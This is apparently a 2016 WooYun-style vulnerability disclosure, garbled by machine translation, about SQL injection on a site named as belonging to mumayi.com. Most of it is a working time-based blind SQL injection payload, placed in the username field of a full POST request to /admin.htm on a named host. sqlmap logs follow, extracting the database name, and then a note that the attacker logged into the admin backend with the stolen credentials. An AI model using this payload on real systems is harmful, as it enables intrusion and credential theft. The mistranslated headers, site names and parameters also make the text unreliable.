漏洞标题 木蚂蚁旗下某站存在SQL注入/并Getshell 相关厂商 mumayi.com 漏洞作者 路人甲 提交时间 2016-04-30 09:41 公开时间 2016-06-17 10:20 漏…
漏洞标题
SQL ant有一个SQL注入/和Getshell
相关制造商
Mumayi.com
漏洞作者
过路人
提交时间
2016-04-30 09: 41
公共时间
2016-06-17 10: 20
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
漏洞详细信息
在木蚂蚁站中有SQL注入,并且是gethell
Kumayi.com
失明后
POST /admin.htm HTTP/1.1
内容长度: 215
内容类型: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:http://www.kumayi.com: 80 /
Cookie: PHPSESSID=12k6poruju02v827qqkf961ja4
主机: www.kumayi.com
连接:保持活动状态
Accept-Encoding: gzip,deflate
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21
接受: */*
电子邮件=样品%40email.tst和放大器;密码=g00dPa%24%24w0rD和放大器;记住=记得,我和放大器;用户名=IF(NOW()%3dsysdate()%2csleep(0)%2C0)/*'XOR(如果(现( )%3dsysdate()%2csleep(0)%2C0))OR'%22XOR(如果(现在的()%3dsysdate()%2csleep(0)%2C0))OR%22 * /
漏洞证明:
[18: 19: 30] [INFO]后端DBMS是MySQL
Web应用程序技术: Nginx,PHP 5.3.21
后端DBMS: MySQL 5
[18: 19: 30] [INFO]获取数据库名称
[18: 19: 30] [INFO]获取数据库数量
[18: 19: 30] [INFO]恢复: 6
[18: 19: 30] [警告](案例)基于时间的比较需要更大的统计数据
[18: 19: 30] [CRITICAL]无法连接到目标URL或代理。 sqlmap去了
Ing重试请求
........(已完成)
[18: 19: 42] [警告]不要对网络适配器duri施加压力非常重要
Ng使用基于时间的有效负载来防止潜在的中断
[18: 19: 43] [警告]如果出现连续数据检索问题,建议您使用
Ed尝试切换'--no-cast'或切换' - hex'
[18: 19: 43] [INFO]检索到:
您是否希望sqlmap尝试优化DBMS延迟响应的值(选项
'--time秒')? [是/否] y
[18: 20: 24] [ERROR]检测到无效字符。重试.
[18: 20: 24] [警告]将时间延迟增加到6秒
[18: 20: 26] [INFO]检索到:
[18: 20: 29] [INFO]检索到:
[18: 20: 32] [INFO]检索到:
[18: 20: 34] [INFO]检索到:
[18: 20: 38] [INFO]回到当前数据库
[18: 20: 38] [INFO]获取当前数据库
[18: 20: 38] [INFO]恢复了: kumayipay_kumayi
可用数据库[1]:
[*] kumayipay_kumayi
[18: 20: 38] [INFO]获取记录到'C: \ Users \ Administrato下的文本文件的数据
r \ .sqlmap \输出\ www.kumayi.com”

获取帐户密码后,登录后台。

修理计划:
过滤
版权声明:请注明出处。居民A @乌云